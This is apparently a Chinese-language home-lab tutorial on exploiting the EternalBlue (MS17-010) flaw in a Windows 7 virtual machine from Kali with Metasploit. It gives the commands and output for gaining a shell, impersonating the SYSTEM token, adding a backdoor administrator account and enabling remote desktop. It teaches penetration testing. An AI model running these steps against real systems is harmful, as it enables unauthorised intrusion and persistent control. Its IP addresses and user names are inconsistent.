1、实验环境:vmware
安装vmware16软件(一直下一步就行):如果需要输入激活码,跳过即可
cn_windows_7_ultimate_x64_dvd_x15-66043.iso(靶机系统)
kali-linux-2020.4-vmware-amd64.7z(系统环境)
2.创建vmware/windows虚拟机
详细安装请私聊博主哈
3.vmware中的win7安装完成后,关闭防火墙
查看windows ip地址
ipconfig #简略信息
ipconfig /all #详细信息
查看自己虚拟机的ip地址,也是靶机地址一般是一个192.开头的内网地址
5.配置系统kali虚拟机
kali官网下载地址:https://www.kali.org/
下载好vm安装包之后配置好登录后进入系统中,欢迎来到kali测试系统
打开终端(类似于windows cmd,但是功能更强大)
进入kali系统命令终端
ping 检查网络是否通畅
ping 10.0.0.130 #假设windows靶机虚拟机ip是10.0.0.130,大家的可能是192开头的
如果没有提示,就是不通,需要解决
ctrl+c取消当前操作
#如果你执行的命令卡住了,或者想取消就按ctrl+c(Linux快捷键)
ip a
#查看卡里ip地址 注意有空格!!!!
#如果连接Xshell则需要启动ssh服务
能ping通,但是ssh连不上,执行sudo /etc/init.d/ssh start,输入kali密码。
msfconsole ###测试环境
功防演练
环境说明
系统 | IP | 作用 |
windows 7系统 | 需要自己通过ipconfifig检查 192.168.10.138 | 靶机,用来演练 |
kali系统 | ip a查看ip地址192.168.10.137 | 用来进行测试 |
步骤
检查windows环境及基本信息
防火墙是否关闭(检查步骤和关闭步骤一致)
查看windows系统ip地址
ipconfig
检查kali系统
检查kali是否能ping通windows系统
在kali终端下面操作
ping 192.168.10.138 #注我的windows ip通过查询是192.168.10.138
如果结果中有个 time=xx ms 表示通了,==恭喜==, ==注意linux下面ping命令默认不会停止需要
ctrl+c停止==
开始
这里利用win7永恒之蓝漏洞(后来被人开发出来的),进行演练
打开kali系统终端,终端中输入 msfconsole 回车 ==注: 这里的进入后图形是随机的==
然后我们要查询永恒之蓝对应的漏洞:叫ms17-010 使用 search ms17-010 ==注意减号
弹出很多,这里我们用序号是2的漏洞,注:一般来说每个漏洞利用方式不同,也需要搭建不同环境,这里
别选错了
使用2号漏洞 use 2 回车即可
你会发现命令行,有红色的内容了,就是我们刚刚选择的漏洞
对于漏洞我们要进行基础设置才能用 输入 options 回车
这里要修改的是 RHOSTS 你的目标是哪个机器 输入 set RHOSTS 192.168.10.138 因为我们已
经知道windows ip是192.168.10.138 ==RHOSTS 写为小写的也行==
发现里面的 RHOSTS已经被修改了
可以开始测试了 输入 run
屏幕会有很多提示和输出 等待出现 ==WIN==即为成功
到这里其实已经进入到靶机成功了.
但是权限还不够,输入 use incognito 进入提权模式
输入sysinfo可查看靶机的信息
Computer : HH-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
#进入提权模式
meterpreter > use incognito
Loading extension incognito...Success.
#查看可用权限
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-2VJGDUILMF1\oldboy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#切换到system权限,注意加上双引号
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
实践操作创建截图:
但是目前还没有办法在远程机器上面执行命令(windows命令)
需要输入 shell 命令后回车
查IP发现已经登录到win7靶机中,创建一个用户,输入 net user admin 123 /add 用户名是admin
密码123
可以输入 net user 检查是否有新用户oldboy
C:\Windows\system32>net user test 123 /add
�����ɹ����ɡ�
C:\Windows\system32>net user ##查看用户
net user
\\ ���û��ʻ�
---------------------------------------------------------------------------
----
Administrator Guest oldboy test
�����������ϣ�������һ��������������
C:\Windows\system32>net localgroup administrators admin /add #将admin用户添加
为管理
最后去靶机windows7下面检查下是否已经建立管理员成功
单击自己头像,开始----计算机---右键----管理
此时注销当前账号,可以使用test用户登录管理系统了。
开启win虚拟机3389端口远程连接靶机,开始”为所欲为“
1.开启靶机3389端口远程连接靶机,开始”为所欲为“。
##退出c盘环境
C:\Windows\system32>exit
exit
##激活靶机远程桌面功能
meterpreter > run post/windows/manage/enable_rdp ##激活靶机远程桌面功能
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it
to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file:
/home/kali/.msf4/loot/20210924045219_default.txt
2.在电脑windows宿主机
- win+徽标键进入运行窗口-输入cmd回车
C:\Users\oldboy>ping 192.168.10.138 -t #测试到靶机是否通畅
正在 Ping 10.0.0.132 具有 32 字节的数据:
来自 10.0.0.132 的回复: 字节=32 时间<1ms TTL=128
来自 10.0.0.132 的回复: 字节=32 时间<1ms TTL=128
3.开启远程连接后,远程连接靶机(使用创建的test管理员,密码123)**
进入运行窗口-输入mstsc回车,开启远程桌面客户端。
输入靶机Ip地址连接